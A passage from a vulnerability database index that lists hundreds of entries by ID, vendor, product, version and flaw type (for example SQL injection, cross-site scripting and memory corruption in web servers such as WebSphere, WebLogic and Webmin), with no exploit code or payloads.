privilege escalation [51753] Sun One Web Server up to 6.0 cross site scripting [51737] IBM WebSphere Service Registry/Repository up to 6.3.0.0 Registry Configuration [51675] Sun Java System Web Server 7.0 Admin Server denial of service [51674] Sun Java System Web Server 7.0 Format String [51673] Sun Java System Web Server 7.0 Authorization memory corruption [51627] Zeus Zeus Web Server up to 4.x Admin Server cross site scripting [51626] Zeus Zeus Web Server up to 3.3.4 weak encryption [51625] Sun Java System Web Server 7.0 memory corruption [51624] Sun Java System Web Server 7.0 privilege escalation [51623] Zeus Zeus Web Server up to 4.x memory corruption [51621] IBM Lotus Web Content Management up to 6.0.1.3 cross site scripting [51541] Yaws Web Server 1.85 Terminal privilege escalation [51482] IBM Domino Web Access up to 229.240 unknown vulnerability [51481] IBM Lotus iNotes up to 229.200 Domino Web Access unknown vulnerability [51479] IBM Lotus iNotes up to 229.20 Domino Web Access unknown vulnerability [51477] Sun Java System Web Server 7.0 memory corruption [51476] Sun Java System Web Server 7.0 memory corruption [51431] Webmin up to 1.2.39 cross site scripting [51394] InterVations NaviCOPA Web Server up to 2.01 index.html%20 information disclosure [51348] Intellicom Netbiter Webscada Ws200 Network Configuration privilege escalation [51342] Provider4u Vsftpd Webmin module up to 1.x unknown vulnerability [51319] Active Web Softwares Active Auction House 3.6 wishlist.asp sql injection [51223] Horde Application Framework up to 3.0.7 Administration Interface phpshell.php cross site scripting [51214] Cisco WebEx 26.00/27.00 WRF Player atrpui.dll memory corruption [51213] Cisco WebEx 26.00/27.00 WRF Player atas32.dll memory corruption [51212] Cisco WebEx 26.00/27.00 WRF Player atas32.dll memory corruption [51211] Cisco WebEx 26.00/27.00 WRF Player ataudio.dll memory corruption [51210] Cisco WebEx 26.00/27.00 WRF Player atas32.dll memory corruption [51209] Cisco WebEx 26.00/27.00 WRF Player atas32.dll memory corruption [51164] IBM DB2 8.2/9.1/9.5/9.7 Interfaces privilege escalation [51111] HP OpenView Network Node Manager 7.53 ovwebsnmpsrv.exe memory corruption [51108] HP OpenView Network Node Manager 7.53 OvWebHelp.exe memory corruption [51107] HP OpenView Network Node Manager 7.53 webappmon.exe memory corruption [51080] IBM InfoSphere Information Server up to 8.0 Web Console cross site scripting [51052] IBM WebSphere Application Server up to 7.0.0.6 weak encryption [51050] Gianni Tommasi Kr-php Web Content Server up to 1.1 adm/krgourl.php privilege escalation [50982] IBM WebSphere Portal up to 6.1.0.1 unknown vulnerability [50981] IBM WebSphere Portal up to 6.1.0.1 cross site scripting [50816] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console cross site request forgery [50718] Sun Java System Web Server 7.0 memory corruption [50627] Fijiwebdesign Com Ajaxchat 1.0 privilege escalation [50547] Citrix XenCenterWeb privilege escalation [50546] Citrix XenCenterWeb cross site request forgery [50545] Citrix XenCenterWeb login.php sql injection [50544] Citrix XenCenterWeb cross site scripting [50477] Davethewebguy Battle Blog 1.25 comment.asp cross site scripting [50476] Davethewebguy Battle Blog 1.25 admin/authenticate.asp sql injection [50392] InterVations NaviCOPA Web Server 3.01 information disclosure [50190] McAfee Email/Web Security Appliance up to 5.1 unknown vulnerability [50185] HP Storageworks Msl4048 Tape Library up to 6.50 Management Interface denial of service [50132] IBM WebSphere Application Server up to 6.1.0.10 denial of service [50130] IBM WebSphere Application Server up to 6.1.0.2 cross site scripting [50119] IBM WebSphere Business Events 6.1 memory corruption [50085] Linuxwebshop php User Base 1.3 directory traversal [50047] Mozilla Bugzilla up to 3.4.1 WebService Bug.create sql injection [50046] Mozilla Bugzilla 3.3.2/3.3.3/3.3.4/3.4.1/3.5 WebService sql injection [49932] IBM WebSphere MQ 7.0.1.0 denial of service [49931] IBM WebSphere MQ up to 6.0.2.3 unknown vulnerability [49930] IBM WebSphere MQ 7.0.0.0 rriDecompress denial of service [49871] IBM WebSphere Application Server up to 6.0.1 Access Restriction privilege escalation [49870] IBM Domino Web Access up to 8.0.0 cross site scripting [49622] IBM WebSphere Commerce Suite Configuration File Net.Commerce information disclosure [49461] WebDynamite ProjectButler 1.5.0 pda_projects.php privilege escalation [49425] IBM WebSphere Partner Gateway Console sql injection [49424] IBM WebSphere Application Server up to 7.0.0.0 Access Restriction privilege escalation [49423] IBM WebSphere Application Server up to 7.0.0.0 privilege escalation [49422] IBM WebSphere Application Server up to 7.0.0.0 Access Restriction denial of service [49421] IBM WebSphere Application Server up to 6.1.0.10 Configuration [49420] IBM WebSphere Application Server up to 6.1.0.10 weak authentication [49417] IBM WebSphere Application Server up to 6.1.0.10 Access Restriction weak authentication [49415] IBM WebSphere Application Server up to 1.0.0.1 Access Restriction weak authentication [49414] IBM WebSphere Commerce up to 6.0.0.3 unknown vulnerability [49395] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49390] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49389] Microsoft Office 2000/2003/XP Office Web Components denial of service [49375] Webhost-panel Bankoi WebHosting Control Panel 1.20 login.asp sql injection [49157] Akiva Webboard 2.90 view.php directory traversal [49144] Resalecode Hutscripts PHP Website Script showcategory.php sql injection [49143] Resalecode Hutscripts PHP Website Script feedback.php cross site scripting [49079] Sony Playstation 3 Web Browser denial of service [48980] Sun Java System Web Server up to 6.1 jsp::$DATA information disclosure [48970] IBM Lotus Instant Messaging/Web Conferencing 6.5.1 Error Message privilege escalation [48944] Fijiwebdesign Com Php index.php sql injection [48853] IBM WebSphere Application Server up to 6.1.0.11 Access Restriction privilege escalation [48837] phion airlock Web Application Firewall 4.1-10.41 denial of service [48835] HP OpenView Network Node Manager 7.53 webappmon.exe memory corruption [48815] Sun Java Web Console up to 3.0.5 cross site scripting [48776] AWScripts Gallery Search Engine 1.5 Admin Interface AWScripts.com weak authentication [48741] Cisco Video Surveillance 2500 Series IP Camera Embedded Web Server information disclosure [48735] IBM WebSphere Application Server up to 6.1.0.10 Access Restriction information disclosure [48629] Creative Web Solutions Multi-Level CMS 1.21 insidepage.php sql injection [48436] Sun Java System Web Server up to 6.0 Proxy Plug-In cross site scripting [48424] webSPELL up to 4.2.0e src/func/language.php directory traversal [48423] TinyWebGallery up to 1.5.3 08.10.2006 1000 directory traversal [48405] IBM WebSphere Application Server up to 6.0.1 cross site scripting [48404] IBM WebSphere Application Server up to 6.0.1 Administrative Console information disclosure [48403] IBM WebSphere Application Server up to 6.0.1 information disclosure [48402] IBM WebSphere Application Server up to 6.0.1 Administrative Console information disclosure [48401] IBM WebSphere Application Server up to 6.1.0.11 IBM WebSphere Portal privilege escalation [48400] IBM WebSphere MQ up to 6.0.2.2 memory corruption [48384] Sun iPlanet Web Server up to 6.0 Default Configuration [48260] Armorlogic Profense Web Application Firewall up to 2.2.20 privilege escalation [48259] IBM WebSphere Partner Gateway up to 6.1.0 information disclosure [48257] Armorlogic Profense Web Application Firewall up to 2.2.20 privilege escalation [48256] Armorlogic Profense Web Application Firewall up to 2.2.20 cross site scripting [48058] IceWarp eMail Server up to 7.4.1 webmail.php sql injection [47928] WebPortal CMS 0.8 Beta indexk.php privilege escalation [47905] webSPELL 4.2.0c cross site scripting [47601] Alikonweb Com Bookjoomlas 0.1 sub_commententry.php sql injection [47555] WEBBDOMAIN Polls 1.0/1.01 getin.php sql injection [47500] uTorrent Web GUI 0.315 Administrator Account /gui/index.php cross site request forgery [47486] Check Point Firewall-1 PKI Web Service Authorization memory corruption [47482] Fullrevolution aspWebCalendar privilege escalation [47418] IBM WebSphere Application Server up to 7.0.0.0 Web Services Security weak encryption [47416] IBM WebSphere Application Server up to 6.1.0.10 Web Services Security privilege escalation [47415] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console weak authentication [47410] Puppet Master webutil 2.7 webutil.pl privilege escalation [47409] Puppet Master webutil 2.3 webutil.pl privilege escalation [47408] Puppet Master webutil 2.3/2.7 webutil.pl privilege escalation [47396] Comscripts Web Server Creator Web Portal 0.1 createdb.php privilege escalation [47391] DotNetNuke up to 4.8.1 Access Restriction web.config privilege escalation [47275] IBM WebSphere Application Server 6.1.0.11 com.ibm.wsspi.wssecurity.core Stored weak authentication [47156] IBM WebSphere Application Server 6.1.0.11 information disclosure [47068] IBM WebSphere Application Server 6.1.0.3 cross site scripting [47067] IBM WebSphere Application Server 6.1.0.3 cross site scripting [46980] TYPO3 up to 4.2.5 User Interface cross site scripting [46935] Yaws Web Server up to 1.79 denial of service [46816] IBM WebSphere Process Server up to 6.1.1 Administrative Console Configuration [46765] Appstate phpWebSite up to 0.9.3-4 links.php sql injection [46739] Comdev Web Blogger up to 4.1 sql injection [46722] ASPThai.Net Webboard 6.0 bview.asp sql injection [46701] IBM WebSphere Partner Gateway up to 6.0.0.2 weak authentication [46595] Trend Micro InterScan Web Security Suite up to 3.0 privilege escalation [46594] Trend Micro InterScan Web Security Virtual Appliance 3.1 Windows Media Player information disclosure [46581] IBM WebSphere Application Server up to 6.1.0.10 denial of service [46463] IBM WebSphere Application Server privilege escalation [46460] IBM WebSphere Application Server up to 6.1.0.10 Java Message Service denial of service [46458] IBM WebSphere Application Server up to 6.1.0.10 denial of service [46457] IBM WebSphere Application Server up to 6.1.0.10 Configuration [46450] ibm WebSphere Application Server up to 6.0.1.11 privilege escalation [46449] IBM WebSphere Application Server up to 5.0.2.7 privilege escalation [46438] Armorlogic Profense Web Application Firewall 2.6.2 ajax.html cross site request forgery [46437] Armorlogic Profense Web Application Firewall 2.6.2 proxy.html cross site scripting [46405] Web Design Hero JoomlaDate 1.2 index.php sql injection [46360] HP OpenView Network Node Manager 7.53 webappmon.exe privilege escalation [46350] GoAhead WebServer up to 2.1.4 privilege escalation [46349] GoAhead WebServer up to 2.1.5 websSafeUrl privilege escalation [46348] GoAhead WebServer 2.0/2.1/2.1.1/2.1.2/2.1.3 sockGen.c socketInputBuffered unknown vulnerability [46347] GoAhead WebServer 2.0/2.1 denial of service [46346] GoAhead WebServer 2.0/2.1/2.1.1/2.1.2/2.1.3 webs.c privilege escalation [46345] GoAhead WebServer 2.0/2.1/2.1.1/2.1.2/2.1.3 webs.c privilege escalation [46344] GoAhead WebServer 2.0/2.1 Security weak authentication [46298] Webmin/Usermin up to 1.680 Referer Checker cross site scripting [46297] Webmin/Usermin up to 1.590 cross site scripting [46296] Webmin/Usermin up to 1.590 PopUp cross site scripting [46259] Novell GroupWise up to 8.0 WebAccess information disclosure [46228] IBM WebSphere Application Server 6.0.1 information disclosure [46225] Novell GroupWise up to 8.0 WebAccess cross site request forgery [46171] DMXReady Blog Manager inc_webblogmanager.asp sql injection [46170] DMXReady Blog Manager inc_webblogmanager.asp cross site scripting [46082] PHP JOBWEBSITE PRO sql injection [46081] PHP JOBWEBSITE PRO cross site scripting [46047] PHPSTREET Webboard 1.0 privilege escalation [46046] PHPSTREET Webboard 1.0 show.php sql injection [45992] Cmsisweb CMS ISWEB 3.0 index.php sql injection [45991] Cmsisweb CMS ISWEB 3.0 index.php cross site scripting [45909] IBM WebSphere DataPower XML Security Gateway XS40 3.6.1.5 Firmware privilege escalation [45589] IBM WebSphere Portal up to 6.0.0.0 BasicAuthTAI privilege escalation [45541] Activewebsoftwares Active Photo Gallery 6.2 account.asp sql injection [45532] Activewebsoftwares Active Time Billing 3.2 Account.asp sql injection [45445] Sun Java Web Console up to 3.0.5 unknown vulnerability [45444] Sun Java System Portal Server 7.1 Java Web Console privilege escalation [45421] DrWeb Anti-virus 4.44.0.09170 privilege escalation [45365] IBM WebSphere Application Server Web Services Security information disclosure [45364] IBM WebSphere Application Server information disclosure [45363] IBM WebSphere Application Server information disclosure [45362] IBM WebSphere Application Server weak encryption [45295] Bdigital Web Solutions WebStudio CMS index.php sql injection [45248] Bdigital Web Solutions WebStudio eHotel index.php sql injection [45162] Aj Square AJ Auction up to Web 2.0 classifide_ad.php sql injection [45150] Com Xewebtv on Joomla index.php sql injection [45052] Trend Micro ServerProtect 5.7/5.58 RPC Interface memory corruption [45051] Trend Micro ServerProtect 5.7/5.58 RPC Interface weak authentication [45016] Deeserver Panuwat PromoteWeb MySQL go.php sql injection [45009] Smolinari Mini Web Calendar 1.2 php/cal_pdf.php directory traversal [45008] Smolinari Mini Web Calendar 1.2 php/cal_default.php cross site scripting [44950] myWebland Bloggie Lite 0.0.2 genscode.php sql injection [44872] Comingchina U-Mail Webmail server 4.91 privilege escalation [44826] Sun Java Web Start privilege escalation [44777] Arihiro Kurta Kantan WEB Server up to 1.8 directory traversal [44668] PhpWebGallery 1.3.4 init.inc.php directory traversal [44665] Microsoft Peachtree Accounting 2004 ActiveX Control PAWWeb11.ocx unknown vulnerability [44650] IBM WebSphere Application Server up to 6.0.1.10 Web Services Security weak authentication [44649] IBM WebSphere Application Server up to 6.0.1 denial of service [44645] WebBiscuits Events Calendar 1.1 privilege escalation [44638] Deeserver Ultimate Webboard 3.00 webboard.php sql injection [44617] PhpWebGallery up to 1.7.2 privilege escalation [44589] Microsoft Exchange Server 2003 Outlook Web Access directory traversal [44559] PhpWebGallery 1.3.4 cross site scripting [44520] Oracle WebLogic Workshop 8.1 unknown vulnerability [44466] Sun Java System Web Proxy Server up to 4.0.1 memory corruption [44411] PHP Web Explorer Php Web Explorer Lite up to 0.99b main.php directory traversal [44285] ParsaGostar ParsaWeb CMS default.aspx sql injection [44268] WebPortal CMS 0.6 Beta/0.6.0/0.7.3/0.7.4 download.php sql injection [44102] living-e webEdition CMS sql injection [44066] IBM WebSphere Application Server up to 6.1.0.10 information disclosure [43771] Turnkeywebtools PHP Live Helper up to 2.0 globalsoff.php privilege escalation [43770] Turnkeywebtools PHP Live Helper up to 2.0 libsecure.php privilege escalation [43769] Turnkeywebtools PHP Live Helper up to 2.0 onlinestatus_html.php get sql injection [43702] Sun Java System Web Proxy Server up to 4.0.1 File Descriptors denial of service [43667] Horde Groupware Webmail Edition up to 1.0 cross site scripting [43644] Psychdaily Php Ring Webring System 0.9.1 privilege escalation [43600] Cisco WebEx Meeting Manager up to 20.2008.2601.4927 ActiveX Control atucfobj.dll memory corruption [43566] Novell Groupwise 7.0/7.0.2/7.0.3 WebAccess cross site scripting [43532] PhpWebGallery 1.7.0/1.7.1 information disclosure [43531] Red Hat JBoss Web Framework Kit 2.5.0 Logging org.jboss.seam.web.AuthenticationFilter privilege escalation [43525] Webmin/Usermin 1.590 privilege escalation [43517] IBM WebSphere Portal up to 5.1.0.4 privilege escalation [43481] Sun Java System Web Server Plugin 7.0 weak authentication [43449] Webwizguide Web Wiz Forum 9.5 log_off_user.asp cross site request forgery [43448] Webwizguide Web Wiz Forum 9.5 admin_group_details.asp cross site scripting [43443] Linuxwebshop php Help Agent 1.0 directory traversal [43329] BEA WebLogic Server up to 5.1 mod_wl .jsp memory corruption [43327] Ln-lab WebProxy up to 1.7.8 cross site scripting [43310] IBM WebSphere Application Server up to 5.1.1.4 weak encryption [43309] IBM WebSphere Application Server up to 5.1.1.4 privilege escalation [43178] WebBlizzard Content Management System index.php sql injection [43117] Com Brightweblinks on Joomla sql injection [43103] Microsoft Exchange Srv 2007 Sp1 Outlook Web Access cross site scripting [43054] VanGogh Web CMS 0.9 get_article.php sql injection [42972] PHP JOBWEBSITE PRO Search Module jobsearch3.php sql injection [42961] AWBS Advanced Webhost Billing System up to 2.5 news.php sql injection [42933] Webdevindo-CMS 1.0.0 webd index.php sql injection [42915] Aj Square AJ Auction Web 2.0 category.php sql injection [42890] K5n WebCalendar 1.0.4 send_reminders.php privilege escalation [42886] Fullrevolution Aspwebcalendar2008 File Upload calendar_admin.asp privilege escalation [42874] Xerox WorkCentre M123/M128/M133 Embedded Web Server cross site scripting [42873] Xerox WorkCentre 7655/7665/7675 Web Services privilege escalation [42866] Nitropowered NiTrO Web Gallery up to 1.4.3 albums.php sql injection [42712] Cisco Linksys Wrh54g Router 1.01.03 Management Interface privilege escalation [42657] IBM WebSphere Application Server up to 6.1.0.10 Web Services Security denial of service [42613] Sun Java System Web Server cross site scripting [42593] Apple Mac OS X up to 10.4.10 Embedded Web Server directory traversal [42517] SAP Web Application Server cross site scripting [42505] How2ASP Webboard 4.1 showqanswer.asp sql injection [42498] IBM Lotus Domino Web Server Web Container cross site scripting [42464] WebManager-Pro CMS WebManager-Pro index.php sql injection [42385] IBM WebSphere Application Server 5.0.2 unknown vulnerability [42358] Miniweb2 Blog Writer 2.0 index.php sql injection [42323] Sun Java System Web Server up to 6.0 Search Module index.jsp cross site scripting [42303] cPanel up to 11.22.2 WHM Interface cross site request forgery [42302] cPanel up to 11.22.2 WHM Interface cross site scripting [42282] Sun Java System Web Server information disclosure [42263] Mozilla Bugzilla 3.1.3 RPC Interface privilege escalation [42134] Php Resource Voice Of Web AllMyGuests 0.4.1 index.php sql injection [42127] Webcalendar Web Calendar Pro up to 4.0 one_day.php sql injection [42123] Akiva WebBoard 8.0 cross site scripting [42052] Terong Advanced Web Photo Gallery 1.0 index.php sql injection [41966] Drupal Webform Module up to 6.x-1.0 cross site scripting [41891] Terong Advanced Web Photo Gallery 1.0 MySQL Database weak encryption [41668] webSPELL 4.1.2 index.php cross site scripting [41448] Microsoft Office 2000/Xp Office Web Components privilege escalation [41445] Sun Java Web Console 3.0.3 Access Restriction unknown vulnerability [41442] Silver-forge Neptune Web Server 3.0 Error Page cross site scripting [41339] Php Web Scripts Dynamic Photo Gallery 1.0.2 album.php sql injection [41300] Rising Antivirus International Rising Web Scan Object 18.0.7 ActiveX Control ol2005.dll unknown vulnerability [41272] Portail Web Php up to 2.5.1.1 privilege escalation [41242] Linux Web Shop php User Base 1.3 privilege escalation [41241] Linux Web Shop php Download Manager 1.1 directory traversal [41238] PORAR WEBBOARD question.asp sql injection [41185] BEA WebLogic Server denial of service [41184] BEA WebLogic Server up to 10.0 cross site scripting [41183] BEA WebLogic Server up to 10.0 privilege escalation [41182] BEA WebLogic Server up to 8.1 privilege escalation [41181] BEA WebLogic Server up to 10.0 Administration Console cross site scripting [41180] BEA WebLogic Server up to 9.1 Access Restriction privilege escalation [41179] BEA WebLogic Server up to 10.0 Access Restriction privilege escalation [41178] BEA WebLogic Portal up to 10.0 Access Restriction privilege escalation [41177] BEA WebLogic Server up to 10.0 weak authentication [41170] PHP-Nuke Web Links Module Web_Links modules.php sql injection [41161] BEA WebLogic Portal up to 10.0 Administration Console privilege escalation [41160] BEA WebLogic Workshop up to 8.1 UI Framework cross site scripting [41159] BEA WebLogic Portal up to 10.0 cross site scripting [41157] BEA WebLogic Workshop 8.1 cross site scripting [41156] BEA WebLogic Portal up to 8.1 privilege escalation [41155] BEA WebLogic Portal up to 8.1 Access Restriction privilege escalation [41154] BEA WebLogic Server 9.1 information disclosure [41012] IBM WebSphere Application Server up to 6.0.2.23 privilege escalation [40962] Webmin 1.3/1.32/1.370/1.390 Search Box webmin_search.cgi cross site scripting [40959] IBM WebSphere Edge Server up to 5.1.1 cross site scripting [40890] Portail Web Php 2.5.1.1 privilege escalation [40836] webSPELL 4.01.02 cross site request forgery [40835] webSPELL 4.01.02 index.php cross site scripting [40790] WebCalendar 1.1.6 User Authentication pref.php cross site scripting [40746] Web Wiz Forums 9.07 rte_file_browser.asp directory traversal [40701] Foojan PHP Weblog 1.0 index.php sql injection [40669] IBM WebSphere Business Modeler up to 6.0.x Access Restriction privilege escalation [40602] MiniWeb HTTP Server 0.8.19 http.c mwgetlocalfilename directory traversal [40601] MiniWeb HTTP Server 0.8.19 http.c _mwprocessreadsocket memory corruption [40586] Menalto Gallery Webcam Module up to 2.2.2 cross site scripting [40532] Drupal BUEditor 4.7.x-1.0/5.x-1.0 Interfaces cross site request forgery [40479] PHP Webquest 2.6 soporte_horizontal_w.php sql injection [40477] IBM WebSphere Application Server up to 6.1.0.2 Administrative Console information disclosure [40411] WebPortal WebPortal CMS 0.6_beta actions.php sql injection [40410] WebPortal WebPortal CMS 0.6_beta actions.php privilege escalation [40375] WebPortal WebPortal CMS up to 0.6.0 index.php sql injection [40355] phpWebSite 1.4.0 Search Module index.php cross site scripting [40280] Sun Java System Web Proxy Server up to 3.5 cross site scripting [40279] Sun Java System Web Proxy Server up to 3.5 cross site scripting [40278] Sun Java System Web Proxy Server up to 3.5 cross site scripting [40277] Sun Java System Web Proxy Server up to 4.0.5 cross site scripting [40233] IBM Domino Web Access 7.0.1 inotes6.dll installbrowserhelperdll memory corruption [40213] Trend Micro ServerProtect 5.58 Security Patch 3 RPC Interface spntsvc.exe privilege escalation [40193] Kvaliitti Webdoc Cms 3.0 webd categories.asp sql injection [40147] Raiden Professional Servers raidenhttpd 2.0.19 Admin Function workspace.php webadmin directory traversal [40068] BEA WebLogic Mobility Server up to 3.6 weak authentication [40008] Real Time Logic Barracudadrive Web Server Home Server up to 3.7.1 directory traversal [40007] Real Time Logic Barracudadrive Web Server Home Server up to 3.7.1 cross site scripting [40006] Real Time Logic Barracudadrive Web Server Home Server up to 3.7.1 memory corruption [40005] Real Time Logic Barracudadrive Web Server Home Server up to 3.7.1 privilege escalation [40000] webSPELL 4.1.2 index.php cross site scripting [39861] Proverbs Proverbs Web Calendar up to 1.1 caladmin.inc.php sql injection [39770] IBM WebSphere MQ 6.0 denial of service [39739] Webex Communications Webex Gpccontainer Activex Control ActiveX Control denial of service [39608] Cisco Unified MeetingPlace up to 4.3.0.246 mpweb/scripts/mpx.dll cross site scripting [39555] Hitachi Groupmax Collaboration Portal up to 07_32_c Web Client information disclosure [39542] IBM WebSphere Application Server up to 6.1.0.11 uddigui/navigateTree.do cross site request forgery [39541] IBM WebSphere Application Server up to 6.1.0.11 uddigui/navigateTree.do cross site scripting [39506] Agtc Websolutions Php-agtc Membership System 1.1a adduser.php weak authentication [39420] Litespeed Technologies LiteSpeed Web Server up to 3.2.2 php%00.txt information disclosure [39288] Artmedic Webdesign Artmedic CMS up to 3.4 index.php directory traversal [39235] CA BrightStor ARCServe BackUp up to 11.1 RPC Interface mediasvr.exe memory corruption [39209] webmaster-tips.net Flash RSS Reader 1.0 on Joomla admin.wmtrssreader.php privilege escalation [39166] webmaster-tips.net Flash Image Gallery 1.0 on Joomla admin.wmtgallery.php privilege escalation [39112] Webhost Automation Helm Web Hosting Control Panel 3.2.16 domain.asp cross site request forgery [38944] Webmin 1.360 privilege escalation [38915] Mozilla Bugzilla 3.0.0/3.0.1/3.1.0/3.1.1 WebService offer_account_by_email privilege escalation [38883] PhpWebGallery 1.7.0 picture.php cross site scripting [38854] TinyWebGallery 1.6.3.4 index.php cross site scripting [38810] PHP Webquest up to 2.5 soporte_derecha_w.php sql injection [38805] Boa Boa Webserver 0.93.15 Stored privilege escalation [38783] Wordpress up to 2.2.2 RPC Interface sql injection [38755] IBM WebSphere Application Server up to 6.1.0.8 unknown vulnerability [38692] ER Mapper Image Web Server Ecw Jpeg 2000 Plug-in up to 7 View ActiveX Control ncsview.dll memory corruption [38649] Weblogicnet es_desp.php privilege escalation [38587] BEA WebLogic Server up to 6.1 denial of service [38586] BEA WebLogic Server up to 8.1 denial of service [38585] BEA WebLogic Server up to 10.0 information disclosure [38584] BEA WebLogic Server up to 8.1 unknown vulnerability [38583] BEA WebLogic Server 9.1 privilege escalation [38582] BEA WebLogic Server up to 8.1 weak encryption [38535] Novell Groupwise Webaccess 6.5 WebAccess cross site scripting [38515] Mozilla Bugzilla up to 3.0.0 WebService privilege escalation [38301] Zyxel Zywall 2 3.62(wk.6) Management Interface cross site request forgery [38300] Zyxel Zywall 2 3.62(wk.6) Management Interface cross site scripting [38299] Zyxel Zywall 2 3.62(wk.6) Management Interface Forms/General_1 cross site request forgery [38298] Zyxel Zywall 2 3.62(wk.6) Management Interface weak authentication [38216] Hitachi Groupmax Collaboration Web Client up to 07-32_a information disclosure [38195] WikiWebWeaver 1.1 File Upload index.php unknown vulnerability [38175] Sun Java System Web Server obj.conf application unknown vulnerability [38119] Advanced Webhost Billing System up to 2.5.0 unknown vulnerability [38118] Advanced Webhost Billing System up to 2.5.0 cross site scripting [38080] Tincan Webbler CMS up to 3.1.3 unknown vulnerability [38079] Tincan Webbler CMS up to 3.1.3 Installation index.php information disclosure [38078] Tincan Webbler CMS up to 3.1.3 uploader/index.php cross site scripting [38029] Webspell 4.01.02 index.php directory traversal [37964] IBM WebSphere Application Server up to 6.0.2.18 unknown vulnerability [37773] Sun Java System Web Server up to 7.0 privilege escalation [37681] vtiger CRM 5.0.2 WebService unknown vulnerability [37636] Webixir Efendy Blog 1.0 ara.asp cross site scripting [37610] Daniel Toma WebChat 0.78 Login login.php sql injection [37492] web-app.org WebAPP 0.9.9.6 instantmessage.pl moveim unknown vulnerability [37491] web-app.org WebAPP 0.9.9.6 instantmessage.pl imview3 unknown vulnerability [37490] web-app.org WebAPP 0.9.9.6 Printing cgi-bin/cgi-lib/subs.pl getcgi unknown vulnerability [37489] web-app.org WebAPP 0.9.9.6 Capabilities unknown vulnerability [37488] web-app.org WebAPP 0.9.9.6 cgi-bin/cgi-lib/subs.pl loaduser unknown vulnerability [37487] web-app.org WebAPP 0.9.9.6 cgi-bin/cgi-lib/user.pl editprofile3 unknown vulnerability [37486] web-app.org WebAPP 0.9.9.6 forum_display.pl displaypost unknown vulnerability [37485] web-app.org WebAPP 0.9.9.6 search.pl show_recent_searches cross site scripting [37484] web-app.org WebAPP 0.9.9.3.3/0.9.9.3.4/0.9.9.6/2007 Administration cross site request forgery [37458] Key Focus KF Web Server 3.1.0 cross site scripting [37441] Apple Mac OS X up to 10.4.8 WebCore setRequestHeader cross site scripting [37439] Apple Mac OS X up to 10.4.8 WebKit memory corruption [37334] IBM WebSphere Application Server up to 6.1.0.7 cross site scripting [37331] IBM WebSphere Portal 1.0 content.php sql injection [37330] IBM WebSphere Portal 1.0 Error Message content.php information disclosure [37323] Sun Solaris 10.0 Interfaces denial of service [37302] Singapore Image Gallery Web Application Error Message index.php information disclosure [37223] MiniWeb Http Server 0.8.1 http.c denial of service [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [37152] Comdev Web Blogger 4.1 sampleblogger.php privilege escalation [37138] BDigital Web Solutions WebStudio CMS index.php cross site scripting [37134] IBM Lotus Domino Web Server up to 7.0.1 denial of service [37108] Hitachi Groupmax Collaboration Web Client File Sharing cross site scripting [37103] Mbedthis AppWeb HTTP Server 2.0.5-4 Logging mprlogtofile::logevent denial of service [37102] Mbedthis AppWeb HTTP Server up to 2.2.1 Trace information disclosure [37090] IBM AIX 5.2.0/5.3 WebSM unknown vulnerability [36989] GForge 4.5.16 cvsweb.php privilege escalation [36988] Sun Java System Web Proxy Server up to 4.0.4 SOCKS Proxy memory corruption [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal [36826] BEA WebLogic Workshop up to 9.2 Console directory traversal [36825] BEA WebLogic Server up to 9.0 denial of service [36824] BEA WebLogic Portal 9.2 unknown vulnerability [36823] BEA WebLogic Portal 9.2 Rich Text Editor cross site scripting [36822] BEA WebLogic Server up to 7.0 unknown vulnerability [36821] BEA WebLogic Server 9.0 Configuration File information disclosure [36820] BEA WebLogic Server 9.0 Administration Console unknown vulnerability [36819] BEA WebLogic Server 9.0 Administration Console weak encryption [36818] BEA WebLogic Server up to 7.0 denial of service [36817] BEA WebLogic Server up to 6.1 unknown vulnerability [36816] BEA WebLogic Server up to 6.1 unknown vulnerability [36815] BEA WebLogic Server up to 6.1 cross site scripting [36806] Canon Network Camera Server VB100 up to 3.0 Management Interface cross site scripting [36794] webdesproxy 0.0.1 webdesproxy.c process_connection_request memory corruption [36620] Microsoft Exchange Server 2000 Outlook Web Access cross site scripting [36531] Pi3Web Web Server 2.0.3 denial of service [36510] WebSPELL 4.01.02 picture.php directory traversal [36509] WebSPELL 4.01.02 picture.php unknown vulnerability [36481] IBM WebSphere Application Server up to 5.1.1.13 unknown vulnerability [36467] InterVations NaviCOPA Web Server 2.01 denial of service [36429] Digium Asterisk up to 1.4.2 Manager Interface manager.conf denial of service [36409] Advanced Webhost Billing System cart2.php privilege escalation [36403] Progress Webspeed Messenger wsisa.dll unknown vulnerability [36341] PHP-Ring Webring System 0.9 index.php sql injection [36097] Guernion Sylvain Portail Web Php index.php privilege escalation [36089] WebBlizzard Content Management System weak authentication [36085] IBM WebSphere Application Server up to 6.1.0.6 denial of service [36082] IBM Lotus Notes up to 6.5.5 Domino Web Access cross site scripting [36000] Webasyst_llc smarty privilege escalation [35977] web-app.org WebAPP 0.9.9.5 unknown vulnerability [35976] web-app.org WebAPP up to 0.9.9.5 unknown vulnerability [35975] web-app.org WebAPP 0.9.9.6 cross site scripting [35973] web-app.org WebAPP up to 0.9.9.5 cross site scripting [35972] web-app.org WebAPP up to 0.9.9.5 memory corruption [35932] Kaqoo Auction Software Interfaces support.inc.php privilege escalation [35928] Hitachi Cosminexus Collaboration Portal Web Client sql injection [35887] InterVations Navicopa Web Server 2.01 cgi-bin memory corruption [35864] Active Web Softwares Active Auction House 7.1 default.asp sql injection [35807] Active Web Softwares Active Photo Gallery 6.2 default.asp sql injection [35800] WordPress up to 2.1.3 Rc1 Administration Interface cross site scripting [35723] Webwizguide Web Wiz Forums up to 8.x Filters functions_filters.asp formatSQLInput sql injection [35699] Sun Java System Web Server up to 6.0 Authorization unknown vulnerability [35672] IBM WebSphere Application Server up to 5.1.1.9 information disclosure [35671] IBM WebSphere Application Server up to 5.0 information disclosure [35670] IBM WebSphere Application Server up to 5.0.1 information disclosure [35651] web-app.org WebAPP 0.9.9.4/0.9.9.5/0.9.9.6 cross site request forgery [35650] Sun Java System Web Server unknown vulnerability [35645] K5n WebCalendar 0.9.45 Login login.php privilege escalation [35511] WebCalendar 1.0.0/1.0.1/1.0.2/1.0.3/1.0.4 privilege escalation [35406] Webmin up to 1.3.20 chooser.cgi cross site request forgery [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption [35390] Web-app.org WebAPP up to 0.9.9.5 unknown 